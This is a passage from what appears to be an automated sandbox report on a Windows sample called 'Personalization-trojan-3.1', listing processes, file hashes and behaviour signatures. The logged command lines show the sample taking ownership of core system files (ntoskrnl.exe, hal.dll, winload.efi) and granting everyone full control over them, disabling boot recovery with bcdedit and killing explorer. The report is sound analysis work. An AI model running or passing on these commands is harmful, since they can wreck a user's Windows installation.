C:\Windows\system32\icacls.exe
icacls "C:\Windows\System32\ci.dll" /grant everyone:F
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32\winload.efi"
C:\Windows\system32\icacls.exe
icacls "C:\Windows\System32\winload.efi" /grant everyone:F
C:\Windows\system32\bcdedit.exe
bcdedit /set {default} recoveryenabled no
C:\Windows\system32\takeown.exe
takeown /f "C:\Program Files\WindowsApps"
C:\Windows\system32\icacls.exe
icacls "C:\Program Files\WindowsApps" /grant everyone:F
C:\Windows\system32\taskkill.exe
taskkill /f /im explorer.exe
C:\Windows\system32\cmd.exe
cmd.exe
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Windows\system32\notepad.exe
notepad.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DeviceAssociationService
Network
Files
C:\Users\Admin\AppData\Local\Temp\4527.tmp\4528.tmp\4529.bat
| MD5 | fdc1bd905021633dfd77610ba86f7663 |
| SHA1 | 101d7151ce4993d4f314ac2e837a9f9292846cb5 |
| SHA256 | 439296ca854b289a4edb016c1ae4c37caeecd23bed10e512fc8b45c4259de9f8 |
| SHA512 | b6e6ec61cfae62c9e19e3882562e4f5ac0a53ade92d29e5cd5029e80b0a6462b09e7554493b50487cf7a18cabd823de297b8851b02677d5753eec9fee903653e |
Analysis: behavioral3
Detonation Overview
Submitted
2024-06-19 12:33
Reported
2024-06-19 12:36
Platform
win7-20240220-en
Max time kernel
117s
Max time network
117s
Command Line
Signatures
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\mmc.vbs"
Network
Files
Analysis: behavioral5
Detonation Overview
Submitted
2024-06-19 12:33
Reported
2024-06-19 12:36
Platform
win7-20240508-en
Max time kernel
149s
Max time network
120s
Command Line
Signatures
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\msg.bat"
Network
Files
Analysis: behavioral8
Detonation Overview
Submitted
2024-06-19 12:33
Reported
2024-06-19 12:36
Platform
win10v2004-20240611-en
Max time kernel
140s
Max time network
125s
Command Line
Signatures
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\cmd.exe | N/A |
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 220 wrote to memory of 4280 | N/A | C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\msiexec.exe | C:\Windows\system32\cmd.exe |
| PID 220 wrote to memory of 4280 | N/A | C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\msiexec.exe | C:\Windows\system32\cmd.exe |
| PID 4280 wrote to memory of 536 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WScript.exe |
| PID 4280 wrote to memory of 536 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WScript.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\msiexec.exe
"C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\msiexec.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\4C0D.tmp\4C0E.tmp\4C0F.bat C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\msiexec.exe"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\msiexec.vbs"
Network
Files
C:\Users\Admin\AppData\Local\Temp\4C0D.tmp\4C0E.tmp\4C0F.bat
| MD5 | 4c46c91a5d1a43115e11db625f322414 |
| SHA1 | 53c015fe4cf56784db8eaf28048d4cfae09ffa86 |
| SHA256 | 91e88cdab236b8221194160b904c63899baac408596725153245ca8f39c29524 |
| SHA512 | a30ee881c718c2a90b5563f58dca470da353d5e3b7b1e74b0f0c777dd05adafc357a4363a1a0814b6889378c0f37d02e742ab2542f5ec18b3ffd5518285ecfda |
Analysis: behavioral10
Detonation Overview
Submitted
2024-06-19 12:33
Reported
2024-06-19 12:36
Platform
win10v2004-20240508-en
Max time kernel
149s
Max time network
150s
Command Line
Signatures
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\msiexec.vbs"
Network
Files
Analysis: behavioral13
Detonation Overview
Submitted
2024-06-19 12:33
Reported
2024-06-19 12:36
Platform
win7-20240508-en
Max time kernel
121s
Max time network
122s
Command Line
Signatures
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2988 wrote to memory of 1448 | N/A | C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\personalize.exe | C:\Windows\system32\cmd.exe |
| PID 2988 wrote to memory of 1448 | N/A | C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\personalize.exe | C:\Windows\system32\cmd.exe |
| PID 2988 wrote to memory of 1448 | N/A | C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\personalize.exe | C:\Windows\system32\cmd.exe |
| PID 1448 wrote to memory of 2028 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\choice.exe |
| PID 1448 wrote to memory of 2028 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\choice.exe |
| PID 1448 wrote to memory of 2028 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\choice.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\personalize.exe
"C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\personalize.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\337F.tmp\3380.tmp\3381.bat C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\personalize.exe"
C:\Windows\system32\choice.exe
choice /c yn /n /m ""
Network
Files
C:\Users\Admin\AppData\Local\Temp\337F.tmp\3380.tmp\3381.bat
| MD5 | 7c9274396b81ebfe6570c3b6b962e91c |
| SHA1 | d1768cf3a09cc3d652ae71fde70fc76d5c472b90 |
| SHA256 | c5c3916b24fb9aaeb3347e28d3f5ff555b06b4c631fcd779c57cdbac31c83f89 |
| SHA512 | a01a9db207e652a678d45919d306f2068fa6691fe8ed7e8d800f76c9fb9598b739926333283da7dfee187f4a7d57964075b1b8c90739057136b930791956cae3 |
Analysis: behavioral17
Detonation Overview
Submitted
2024-06-19 12:33
Reported
2024-06-19 12:36
Platform
win7-20240419-en
Max time kernel
117s
Max time network
118s
Command Line
Signatures
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\taskmgr.vbs"
Network
Files
Analysis: behavioral18
Detonation Overview
Submitted
2024-06-19 12:33
Reported
2024-06-19 12:36
Platform
win10v2004-20240508-en
Max time kernel
51s
Max time network
51s
Command Line
Signatures
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\taskmgr.vbs"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
Files
Analysis: behavioral22
Detonation Overview
Submitted
2024-06-19 12:33
Reported
2024-06-19 12:36
Platform
win10v2004-20240611-en
Max time kernel
142s
Max time network
127s
Command Line
Signatures
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
Possible privilege escalation attempt
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
File and Directory Permissions Modification: Windows File and Directory Permissions Modification
Drops file in Program Files directory
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | C:\Windows\system32\mspaint.exe | N/A |
Enumerates physical storage devices
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\mspaint.exe | N/A |
| N/A | N/A | C:\Windows\system32\mspaint.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\mspaint.exe | N/A |
| N/A | N/A | C:\Windows\system32\mspaint.exe | N/A |
| N/A | N/A | C:\Windows\system32\mspaint.exe | N/A |
| N/A | N/A | C:\Windows\system32\mspaint.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\winntcus64.bat"
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32\ntoskrnl.exe"
C:\Windows\system32\icacls.exe
icacls "C:\Windows\System32\ntoskrnl.exe" /grant everyone:F
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32\hal.dll"
C:\Windows\system32\icacls.exe
icacls "C:\Windows\System32\hal.dll" /grant everyone:F
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32\ci.dll"
C:\Windows\system32\icacls.exe
icacls "C:\Windows\System32\ci.dll" /grant everyone:F
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32\winload.efi"
C:\Windows\system32\icacls.exe
icacls "C:\Windows\System32\winload.efi" /grant everyone:F
C:\Windows\system32\bcdedit.exe
bcdedit /set {default} recoveryenabled no
C:\Windows\system32\takeown.exe
takeown /f "C:\Program Files\WindowsApps"
C:\Windows\system32\icacls.exe
icacls "C:\Program Files\WindowsApps" /grant everyone:F
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=1416,i,15316930299780304231,7592852768794498680,262144 --variations-seed-version --mojo-platform-channel-handle=4404 /prefetch:8
C:\Windows\system32\taskkill.exe
taskkill /f /im explorer.exe
C:\Windows\system32\cmd.exe
cmd.exe
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Windows\system32\notepad.exe
notepad.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DeviceAssociationService
Network